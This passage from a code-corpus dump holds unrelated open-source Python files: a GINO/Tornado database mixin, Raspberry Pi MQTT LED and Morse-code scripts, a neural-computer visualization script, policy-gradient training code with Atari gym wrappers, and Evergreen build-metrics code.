pool, default is ``10``.
:param ssl: SSL context passed to ``asyncpg.connect``, default is
``None``. This can be ``True`` or an instance of ``ssl.SSLContext``.
:param kwargs: other parameters passed to the specified dialects,
like ``asyncpg``. Unrecognized parameters will cause exceptions.
"""
if loop is None:
loop = tornado.ioloop.IOLoop.current()
if isinstance(loop, tornado.platform.asyncio.BaseAsyncIOLoop):
asyncio_loop = loop.asyncio_loop
elif isinstance(loop, asyncio.BaseEventLoop):
asyncio_loop = loop
else:
raise RuntimeError('AsyncIOLoop is required to run GINO')
if not dsn:
dsn = URL(
drivername=driver, host=host, port=port, username=user,
password=password, database=database,
)
await self.set_bind(
dsn, echo=echo, min_size=pool_min_size, max_size=pool_max_size,
ssl=ssl, loop=asyncio_loop, **kwargs,
)
app.db = self
class DBMixin:
"""
A mixin for tornado.web.Application to initialize and have convenience
methods for database accesses.
"""
db = None # type: Gino
async def init_db(self: [tornado.web.Application, 'DBMixin'],
db: Gino, **kwargs):
await db.init_app(self, **kwargs)
class RequestHandlerMixin:
"""
A mixin to provide convenience methods to access GINO object
"""
@property
def db(self: tornado.web.RequestHandler) -> Gino:
return self.application.db
``` |
{
"source": "jim-obrien-orig/mlv-tools-tutorial",
"score": 3
} |
#### File: jim-obrien-orig/mlv-tools-tutorial/modify_input_data.py
```python
import codecs
import pickle
from os.path import dirname, join
from sklearn.utils import shuffle
cache_path = join(dirname(__file__), 'poc', 'data', '20news-bydate_py3.pkz')
def shuffle_data(subset: str, cache):
cache[subset].data, cache[subset].target, cache[subset].filenames = shuffle(cache[subset].data,
cache[subset].target,
cache[subset].filenames)
with open(cache_path, 'rb') as f:
compressed_content = f.read()
uncompressed_content = codecs.decode(compressed_content, 'zlib_codec')
cache = pickle.loads(uncompressed_content)
shuffle_data('train', cache)
shuffle_data('test', cache)
compressed_content = codecs.encode(pickle.dumps(cache), 'zlib_codec')
with open(cache_path, 'wb') as f:
f.write(compressed_content)
```
#### File: project/classifier/helper.py
```python
import json
from os import makedirs
from os.path import dirname
from typing import List
def write_json(json_file: str, data: dict):
"""
Create parent directories if not exist.
Write the json file.
"""
makedirs(dirname(json_file), exist_ok=True)
with open(json_file, 'w') as fd:
json.dump(data, fd)
def write_lines_file(file_path: str, data_list: List[str]):
"""
Create parent directories if not exist.
Write the file line by line.
"""
makedirs(dirname(file_path), exist_ok=True)
with open(file_path, 'w') as fd:
fd.writelines(['{}{}'.format(line, '' if line.endswith('\n') else '\n') for line in data_list])
```
#### File: project/classifier/pre_process.py
```python
from typing import Tuple, List
from nltk import wordpunct_tokenize
def tokenize_and_clean_text(text: str) -> str:
return ' '.join([token.lower() for token in wordpunct_tokenize(text)
if token.isalpha() and token.lower()])
def clean_formatting(text: List[str]) -> str:
return tokenize_and_clean_text(' '.join(text))
def preprocess_data(extracted_data: List[Tuple[str, str]]) -> List[str]:
"""
Transform data to get compliant with fasttext expected
format: __label__[label] [text]
"""
return [f'__label__{data[0]} {clean_formatting(data[1])}' for data in extracted_data]
``` |
{
"source": "jimoconnell/electrobrain",
"score": 3
} |
#### File: jimoconnell/electrobrain/makermorse.py
```python
dit = 0.25
dah = 3 * dit
lettergap = 3 * dit
wordgap = 7 * dit
# Set which pin you will be connecting LED or sounder to:
# ( BCM Numbering )
signalPin = 25
# Your preferred MQTT Server and topic:
mqttServer = "iot.eclipse.org"
mqttTopic = "test/abcd"
# End of User Settings
#################################################
import paho.mqtt.client as mqtt
import RPi.GPIO as GPIO # always needed with RPi.GPIO
from time import sleep # pull in the sleep function from time module
import time as time
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
# set signalPin (set above) as output for led or sounder
GPIO.setup(signalPin, GPIO.OUT)# set signalPin (set above) as output for led
CODE = {' ': ' ',
"'": '.----.',
'(': '-.--.-',
')': '-.--.-',
',': '--..--',
'-': '-....-',
'.': '.-.-.-',
'/': '-..-.',
'0': '-----',
'1': '.----',
'2': '..---',
'3': '...--',
'4': '....-',
'5': '.....',
'6': '-....',
'7': '--...',
'8': '---..',
'9': '----.',
':': '---...',
';': '-.-.-.',
'?': '..--..',
'!': '---.',
'A': '.-',
'B': '-...',
'C': '-.-.',
'D': '-..',
'E': '.',
'F': '..-.',
'G': '--.',
'H': '....',
'I': '..',
'J': '.---',
'K': '-.-',
'L': '.-..',
'M': '--',
'N': '-.',
'O': '---',
'P': '.--.',
'Q': '--.-',
'R': '.-.',
'S': '...',
'T': '-',
'U': '..-',
'V': '...-',
'W': '.--',
'X': '-..-',
'Y': '-.--',
'Z': '--..',
'_': '..--.-'}
# Not sure how to include these, as they conflict with letter.upper()
# 'Ä': '.-.-',
# 'Á': '.--.-',
# 'Å': '.--.-',
# 'Ch': ' ----',
# 'É': '..-..',
# 'Ñ': '--.--',
# 'Ö': '---.',
# 'Ü': '..--'}
def dot():
# print(".")
GPIO.output(signalPin,1)
time.sleep(dit)
GPIO.output(signalPin,0)
time.sleep(dit)
def dash():
# print("_")
GPIO.output(signalPin,1)
time.sleep(dah)
GPIO.output(signalPin,0)
time.sleep(dit)
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected to:\n\t "+mqttServer+":/"+mqttTopic+"\nwith result code: "+str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(mqttTopic)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic+" "+str(msg.payload))
input = msg.topic+" "+str(msg.payload)
input = str(msg.payload)
print(input)
for letter in input:
for symbol in CODE[letter.upper()]:
if symbol == '-':
dash()
elif symbol == '.':
dot()
else:
time.sleep(lettergap)
time.sleep(wordgap)
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(mqttServer, 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
```
#### File: jimoconnell/electrobrain/MessageBlinker.py
```python
import paho.mqtt.client as mqtt
# Rpi.GPIO is the library that lets us talk to the GPIO pins
import RPi.GPIO as GPIO # always needed with RPi.GPIO
# We use sleep(), so let's import it
from time import sleep # pull in the sleep function from time module
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
GPIO.setup(25, GPIO.OUT)# set GPIO 25 as output for white led
GPIO.setup(24, GPIO.OUT)# set GPIO 25 as output for white led
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
#Ask the user what topic they want to watch:
topic = raw_input("Type a topic/channel:\n")
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(topic)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
# Blink some lights when a message is received:
GPIO.output(25,True)
sleep(.05)
GPIO.output(25,False)
sleep(.1)
GPIO.output(24,True)
sleep(.1)
GPIO.output(24,False)
sleep(.1)
GPIO.output(25,True)
sleep(.05)
GPIO.output(25,False)
# wait for new messages:
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("iot.eclipse.org", 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
```
#### File: jimoconnell/electrobrain/notify.py
```python
import pyinotify
import RPi.GPIO as GPIO
import time
mypin = 24
# Use physical pin numbers
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
# Set up header pin 11 (GPIO11) as an input
print "Setup Pin 24"
GPIO.setup(mypin, GPIO.OUT)
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_ACCESS #This monitors any access on files and folders in the dir
class EventHandler(pyinotify.ProcessEvent):
def process_IN_ACCESS(self, event):
print "Accessed:", event.pathname
#Lights on n off at varied intervals
var=1
while var==1 :
print "Set Output False"
GPIO.output(mypin, True)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, False)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, True)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, False)
time.sleep(0.5)
break
handler = EventHandler()
notifier = pyinotify.Notifier(wm, handler)
#Folder to monitor
wdd = wm.add_watch('/var/www', mask, rec=True)
notifier.loop()
``` |
{
"source": "JimOhman/differentiable-neural-computers",
"score": 2
} |
#### File: JimOhman/differentiable-neural-computers/test.py
```python
from utils import get_optimizer, get_loss_function, make_copy_repeat_dataset, make_dirs, get_accuracy
from train import unroll_through_time
import matplotlib.pyplot as plt
from core import Controller
from tqdm import tqdm
import numpy as np
import random
import torch
import os
from collections import defaultdict
from matplotlib import animation
def update_memory_state(controller, memory_state):
memory_state['allocation_gate'].append(controller.memory.gates['allocation_gate'][0, 0])
memory_state['free_gate'].append(controller.memory.gates['free_gate'][0, 0])
memory_state['write_weights'].append(controller.memory.write_weights[0].view(-1))
memory_state['read_weights'].append(controller.memory.read_weights[0].view(-1))
return memory_state
def init_visualization(time_steps, args):
init = {}
init['input and target'] = torch.zeros(args.pattern_width, time_steps)
init['output'] = torch.zeros(args.pattern_width, time_steps)
init['free_gate'] = torch.zeros(args.num_reads, time_steps)
init['allocation_gate'] = torch.zeros(args.num_writes, time_steps)
init['write_weights'] = torch.zeros(args.num_writes*args.capacity, time_steps)
init['read_weights'] = torch.zeros(args.num_reads*args.capacity, time_steps)
images = {}
def add_subplot(title, gridspec, xmax, vmin=0, vmax=1, cmap='gray', aspect='equal'):
ax = fig.add_subplot(gridspec)
ax.set_title(title, fontsize=10, color='white')
ax.set_xlim(xmin=0, xmax=xmax)
images[title] = ax.imshow(init[title], cmap=cmap, vmin=vmin, vmax=vmax, aspect=aspect)
ax.grid('off')
ax.axis('off')
nwc, nrc = 2*args.num_writes, 2*args.num_reads
fig = plt.figure(constrained_layout=True, figsize=args.figsize)
gs = fig.add_gridspec(2 + nwc + nrc, 2, width_ratios=[1, 1])
xmax = time_steps - 1
add_subplot('input and target', gs[0, 0], xmax, aspect='auto')
add_subplot('output', gs[0, 1], xmax, cmap='gist_heat', aspect='auto')
add_subplot('write_weights', gs[1:1+nwc, 0], xmax, cmap='gist_heat', aspect='auto')
add_subplot('read_weights', gs[1+nwc:1+nwc+nrc, 0], xmax, cmap='gist_heat', aspect='auto')
add_subplot('free_gate', gs[1+nwc:1+nwc+nrc, 1], xmax, cmap='gist_heat', aspect='equal')
add_subplot('allocation_gate', gs[1:1+nwc, 1], xmax, cmap='gist_heat', aspect='equal')
fig.patch.set_facecolor('black')
fig.patch.set_alpha(0.8)
return fig, images
def update_figure(inputs, targets, outputs, mask, images, memory_state, args):
input_and_target = 0.5*inputs[:, 0].T + targets[:, 0].T
images['input and target'].set_data(input_and_target)
outputs = torch.cat(outputs)
if args.use_mask and not args.ignore_mask:
outputs *= mask
if args.round:
outputs = outputs.round()
images['output'].set_data(outputs.T)
allocation_gate = torch.stack(memory_state['allocation_gate'], dim=1)
free_gate = torch.stack(memory_state['free_gate'], dim=1)
write_weights = torch.stack(memory_state['write_weights'], dim=1)
read_weights = torch.stack(memory_state['read_weights'], dim=1)
images['allocation_gate'].set_data(allocation_gate)
images['free_gate'].set_data(free_gate)
images['write_weights'].set_data(write_weights)
images['read_weights'].set_data(read_weights)
def visualize_training(args):
states = []
all_nets = os.listdir(args.saves_dir)
filtered_nets = [net for net in all_nets if (args.start_net <= int(net) <= args.end_net)]
for net in sorted(filtered_nets, key=int)[::args.skip+1]:
path = os.path.join(args.saves_dir, net)
state = torch.load(path, map_location=torch.device('cpu'))
state = insert_args(args, state)
state['args'].batch_size = 1
states.append(state)
controller = Controller(state['args'])
device = torch.device('cpu')
dataset = make_copy_repeat_dataset(state['args'])
loader_params = {'batch_size': 1,
'shuffle': True,
'num_workers': 0,
'drop_last': True}
dataset = torch.utils.data.DataLoader(dataset, **loader_params)
with torch.inference_mode():
batch_idx = 0
for inputs, targets, mask in dataset:
inputs = inputs.transpose(0, 1)
targets = targets.transpose(0, 1)
mask = mask.transpose(0, 1)
if args.minimize:
time_steps, _ = torch.nonzero(mask, as_tuple=True)
time_steps = time_steps.max().item()
inputs = inputs[:time_steps, :]
targets = targets[:time_steps, :]
mask = mask[:time_steps, :]
else:
time_steps = inputs.shape[0]
fig, images = init_visualization(time_steps, state['args'])
def animate(i):
state = states[i]
controller.load_state_dict(state['weights'])
outputs = []
memory_state = defaultdict(list)
for t in range(time_steps):
output = controller(inputs[t, :])
outputs.append(output.squeeze(1))
memory_state = update_memory_state(controller, memory_state)
update_figure(inputs, targets, outputs, mask, images, memory_state, state['args'])
controller.memory.reset(device)
return []
animation_params = {'frames': len(states),
'interval': args.sleep,
'blit': True,
'repeat': args.repeat}
anim = animation.FuncAnimation(fig, animate, **animation_params)
plt.show()
if args.save_as_gifs:
gifs_folder = os.path.join(os.path.split(args.saves_dir)[0], 'gifs')
gif_path = os.path.join(gifs_folder, '{}.gif'.format(batch_idx))
os.makedirs(gifs_folder, exist_ok=True)
anim.save(gif_path, writer='imagemagick', fps=60)
batch_idx += 1
def insert_args(args, state):
if args.num_patterns is not None:
state['args'].num_patterns = args.num_patterns
if args.min_pattern_length is not None:
state['args'].min_pattern_length = args.min_pattern_length
if args.max_pattern_length is not None:
state['args'].max_pattern_length = args.max_pattern_length
if args.min_repeats is not None:
state['args'].min_repeats = args.min_repeats
if args.max_repeats is not None:
state['args'].max_repeats = args.max_repeats
if args.num_sequences is not None:
state['args'].num_sequences = args.num_sequences
state['args'].batch_size = args.batch_size
state['args'].ignore_mask = args.ignore_mask
state['args'].visualize = args.visualize
state['args'].sleep = args.sleep
state['args'].figsize = args.figsize
if args.seed:
state['args'].data_seed = args.seed
state['args'].round = args.round
assert state['args'].max_pattern_length >= state['args'].min_pattern_length
assert state['args'].max_repeats >= state['args'].min_repeats
return state
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
test = parser.add_argument_group('test')
test.add_argument('--saves_dir', type=str, default='',
help='The directory where the models are saved.')
test.add_argument('--net', type=int, default=None,
help='The filename for the saved model if not --visualize.')
test.add_argument('--seed', type=int, default=0,
help='The seed for the data loader.')
test.add_argument('--batch_size', type=int, default=1,
help='The amount of sequences per batch.')
test.add_argument('--gpu', action='store_true',
help='Run on default GPU if not --visualize.')
patterns = parser.add_argument_group('patterns')
patterns.add_argument('--num_sequences', type=int, default=None,
help='Amount of sequences in the dataset.')
patterns.add_argument('--min_pattern_length', type=int, default=None,
help='Amount of sequences in the dataset.')
patterns.add_argument('--max_pattern_length', type=int, default=None,
help='Min length of a pattern.')
patterns.add_argument('--num_patterns', type=int, default=None,
help='Max length of a pattern.')
patterns.add_argument('--min_repeats', type=int, default=None,
help='Min amount of repeats for each pattern.')
patterns.add_argument('--max_repeats', type=int, default=None,
help='Max amount of repeats for each pattern.')
visualize = parser.add_argument_group('visualize')
visualize.add_argument('--visualize', action='store_true',
help='Specify to visualize the training process.')
visualize.add_argument('--ignore_mask', action='store_true',
help='Ignore mask in visualization if used during training.')
visualize.add_argument('--save_as_gifs', action='store_true',
help='Save the visualization as a gif.')
visualize.add_argument('--start_net', type=int, default=0,
help='Start visualization from this training step.')
visualize.add_argument('--end_net', type=int, default=np.inf,
help='End visualization at this training step.')
visualize.add_argument('--skip', type=int, default=0,
help='Skip this amount of saved models during visualization.')
visualize.add_argument('--round', action='store_true',
help='Round the output of the network during visualization.')
visualize.add_argument('--sleep', type=int, default=0,
help='Sleep this amount in milliseconds with each step.')
visualize.add_argument('--figsize', nargs=2, type=int, default=None,
help='Specify the figure size.')
visualize.add_argument('--minimize', action='store_true',
help='Remove padding for visualization.')
visualize.add_argument('--repeat', action='store_true',
help='Repeat visualization.')
args = parser.parse_args()
assert args.start_net <= args.end_net
if args.net is not None:
args.start_net = args.net
args.end_net = args.net
if not args.visualize:
path = os.path.join(args.saves_dir, str(args.net))
state = torch.load(path, map_location=torch.device('cpu'))
state = insert_args(args, state)
controller = Controller(state['args'])
controller.load_state_dict(state['weights'])
device = torch.device('cuda' if args.gpu else 'cpu')
controller.to(device)
dataset = make_copy_repeat_dataset(state['args'])
loader_params = {'batch_size': args.batch_size,
'shuffle': True,
'num_workers': 0,
'drop_last': True}
dataset = torch.utils.data.DataLoader(dataset, **loader_params)
loss_function = get_loss_function(state['args'])
with torch.inference_mode():
for inputs, targets, mask in dataset:
inputs = inputs.to(device)
targets = targets.to(device)
mask = mask.to(device)
info = unroll_through_time(controller, loss_function, inputs, targets, mask, state['args'])
outputs, loss, accuracy = info
controller.memory.reset(device)
loss = loss.cpu().item()
accuracy = accuracy.cpu().item()
print('loss: {}, accuracy: {}%'.format(round(loss, 10), round(accuracy, 1)))
else:
visualize_training(args)
``` |
{
"source": "JimOhman/policy-gradient-algorithms",
"score": 2
} |
#### File: policy-gradient-algorithms/VPG/main.py
```python
from agent import VPGAgent
import numpy as np
import gym
from args import parse_args
from logger import Logger
from networks import SimpleNet
from torch.optim import RMSprop, Adam
import datetime
import pytz
import time
def get_env(args):
env = gym.make(args['environment'])
return env
def get_net(env, args):
state_space = env.observation_space.shape[0]
action_space = env.action_space.n
if args['architecture'] == 'SimpleNet':
net = SimpleNet(action_space=action_space, state_space=state_space)
else:
raise NotImplementedError
return net
def get_opt(net, args):
if args['optimizer'] == 'Adam':
optimizer = Adam(net.parameters(), lr=args['learning_rate'], eps=0.00015)
elif args['optimizer'] == 'RMSprop':
optimizer = RMSprop(net.parameters(), lr=args['learning_rate'], momentum=0.95, eps=0.01)
else:
raise NotImplementedError
return optimizer
def get_agent(net, optimizer, env, args):
agent = VPGAgent(net=net, optimizer=optimizer, env=env, args=args)
return agent
def train(agent, args, logr=None):
verbose = args['verbose']
total_batches = args['total_batches']
render = args['render_env']
print("\nStarting training towards {} batch updates. \n".format(total_batches))
for batch_num in range(total_batches):
batch_loss, batch_rets, batch_lens = agent.train_one_batch(render=render)
if verbose:
date_now = datetime.datetime.now(tz=pytz.timezone('Europe/Stockholm')).strftime("%d-%b-%Y_%H:%M:%S")
batch_stats = (round(np.mean(batch_lens)), round(np.std(batch_lens)),
round(np.mean(batch_rets)), round(np.std(batch_rets)))
print("[{}] ({}/{}) --> length: {} ({}), return: {} ({})".format(date_now,
batch_num,
total_batches,
*batch_stats))
if logr is not None:
logr.add_value(tag='loss', value=batch_loss.detach(), it=batch_num)
logr.add_value(tag='return', value=np.mean(batch_rets), it=batch_num)
logr.add_value(tag='length', value=np.mean(batch_lens), it=batch_num)
batch_num += 1
print("\nFinished training.")
def init(args):
print()
env = get_env(args=args)
print("Using environment: {}".format(args['environment']))
net = get_net(env=env, args=args)
print("1. Created net: {}".format(args['architecture']))
optimizer = get_opt(net=net, args=args)
print("2. Created optimizer: {} with lr = {}".format(args['optimizer'], args['learning_rate']))
agent = get_agent(net=net, optimizer=optimizer, env=env, args=args)
print("3. Assembled agentrithm: {}".format(args['agentrithm']))
time.sleep(1.)
return env, net, optimizer, agent
def evaluate(agent, args):
render = args['render_env']
eps_rews = [], eps_obs = []
for episode_num in range(args['eval_episodes']):
ep_rews, ep_obs, _ = agent.run_one_episode(render=render)
print("Batch {} ==> return: {}, length = {}".format(sum(ep_rews), len(ep_rews)))
eps_rews.append(ep_rews)
eps_obs.append(ep_obs)
if __name__ == '__main__':
args = parse_args()
run_tag = '|' + 'opt-' + args['optimizer'] + '|' + 'lr-' + str(args['learning_rate'])
logr = Logger(args=args, run_tag=run_tag)
env, net, optimizer, agent = init(args)
if args['mode'] == 'train':
train(agent=agent, args=args, logr=logr)
elif args['mode'] == 'evaluate':
evaluate(net=net, args=args)
else:
raise NotImplementedError
```
#### File: policy-gradient-algorithms/VPG/utils.py
```python
import numpy as np
import os
os.environ.setdefault('PATH', '')
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class StateMaker(object):
def __init__(self, frames):
self.frames = frames
def _concat(self):
self.out = np.concatenate(self.frames)[np.newaxis, ...]
return self.out
def __array__(self, dtype=None):
state = self._concat()
if dtype is not None:
state = state.astype(dtype)
return state
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, act):
return self.env.step(act)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, act):
return self.env.step(act)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8)
original_space = self.observation_space
self.observation_space = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._grayscale:
obs = cv2.cvtColor(obs, cv2.COLOR_RGB2GRAY)
obs = np.expand_dims(obs, -1)
obs = cv2.resize(obs, (self._width, self._height), interpolation=cv2.INTER_AREA)
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
obs = self.env.reset()
for _ in range(self.k):
self.frames.append(obs)
return self._get_ob()
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.frames.append(obs)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames([list(self.frames)])
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
return np.array(observation).astype(np.float32) / 255.0
class StateMaker(object):
def __init__(self, frames):
self.frames = frames
def _concat(self):
self.out = np.concatenate(self.frames)[np.newaxis, ...]
return self.out
def __array__(self, dtype=None):
state = self._concat()
if dtype is not None:
state = state.astype(dtype)
return state
class LazyFrames(object):
def __init__(self, frames):
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)[np.newaxis, ...]
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
``` |
{
"source": "jimoleary/evergreen.py",
"score": 2
} |
#### File: evergreen/metrics/buildmetrics.py
```python
from __future__ import absolute_import
from __future__ import division
from structlog import get_logger
from evergreen.errors.exceptions import ActiveTaskMetricsException
LOGGER = get_logger(__name__)
class BuildMetrics(object):
"""Metrics about an evergreen build."""
def __init__(self, build):
"""
Create an instance of build metrics.
:param build: Build to analyze.
"""
self.build = build
self.success_count = 0
self.failure_count = 0
self.undispatched_count = 0
self.timed_out_count = 0
self.system_failure_count = 0
self.estimated_build_costs = 0
self.total_processing_time = 0
self._create_times = []
self._start_times = []
self._finish_times = []
self.task_list = None
def calculate(self, task_filter_fn=None):
"""
Calculate metrics for the given build.
:param task_filter_fn: function to filter tasks included for metrics, should accept a task
argument.
:returns: self.
"""
all_tasks = self.build.get_tasks()
filtered_task_list = all_tasks
if task_filter_fn:
filtered_task_list = [task for task in filtered_task_list if task_filter_fn(task)]
self.task_list = filtered_task_list
# We want to track display tasks, but not use them for metrics since they are just
# containers to other tasks.
filtered_task_list = [task for task in self.task_list if not task.display_only]
for task in filtered_task_list:
self._count_task(task)
return self
@property
def total_tasks(self):
"""
Get the total tasks in the build.
:return: total tasks.
"""
return self.success_count + self.failure_count + self.undispatched_count
@property
def pct_tasks_success(self):
"""
Get the percentage of successful tasks.
:return: Percentage of successful tasks.
"""
return self._percent_tasks(self.success_count)
@property
def pct_tasks_undispatched(self):
"""
Get the percentage of undispatched tasks.
:return: Percentage of undispatched tasks.
"""
return self._percent_tasks(self.undispatched_count)
@property
def pct_tasks_failed(self):
"""
Get the percentage of failed tasks.
:return: Percentage of failed tasks.
"""
return self._percent_tasks(self.failure_count)
@property
def pct_tasks_timed_out(self):
"""
Get the percentage of timeout tasks.
:return: Percentage of timeout tasks.
"""
return self._percent_tasks(self.timed_out_count)
@property
def pct_tasks_system_failure(self):
"""
Get the percentage of system failure tasks.
:return: Percentage of system failure tasks.
"""
return self._percent_tasks(self.system_failure_count)
@property
def create_time(self):
"""
Time the first task of the build was created.
:return: Time first task was created.
"""
if self._create_times:
return min(self._create_times)
return None
@property
def start_time(self):
"""
Time first task of build was started.
:return: Time first task was started.
"""
if self._start_times:
return min(self._start_times)
return None
@property
def end_time(self):
"""
Time last task of build was completed.
:return: Time last task was completed.
"""
if self._finish_times:
return max(self._finish_times)
return None
@property
def makespan(self):
"""
Wall clock duration of build.
:return: Timedelta duration of build.
"""
if self.start_time and self.end_time:
return self.end_time - self.start_time
return None
@property
def wait_time(self):
"""
Wall clock duration until build was started.
:return: Timedelta duration until build was started.
"""
if self.start_time and self.create_time:
return self.start_time - self.create_time
return None
def _percent_tasks(self, n_tasks):
"""
Calculate the percent of n_tasks out of total.
:param n_tasks: Number of tasks to calculate percent of.
:return: percentage n_tasks is out of total tasks.
"""
if self.total_tasks == 0:
return 0
return n_tasks / self.total_tasks
def _count_task(self, task):
"""
Add stats for the given task to the metrics.
:param task: Task to add.
"""
if task.is_undispatched():
self.undispatched_count += 1
return # An 'undispatched' task has no useful stats.
if task.is_active():
LOGGER.warning('Active task found during metrics collection', task_id=task.task_id)
raise ActiveTaskMetricsException(task, 'Task in progress during metrics collection')
if task.is_success():
self.success_count += 1
else:
self.failure_count += 1
if task.is_system_failure():
self.system_failure_count += 1
if task.is_timeout():
self.timed_out_count += 1
if task.ingest_time:
self._create_times.append(task.ingest_time)
else:
self._create_times.append(task.start_time)
if task.start_time:
self._finish_times.append(task.finish_time)
if task.start_time:
self._start_times.append(task.start_time)
self.estimated_build_costs += task.estimated_cost
self.total_processing_time += task.time_taken_ms / 1000
def as_dict(self, include_children=False):
"""
Provide a dictionary representation.
:param include_children: Include child tasks in dictionary.
:return: Dictionary of metrics.
"""
metric = {
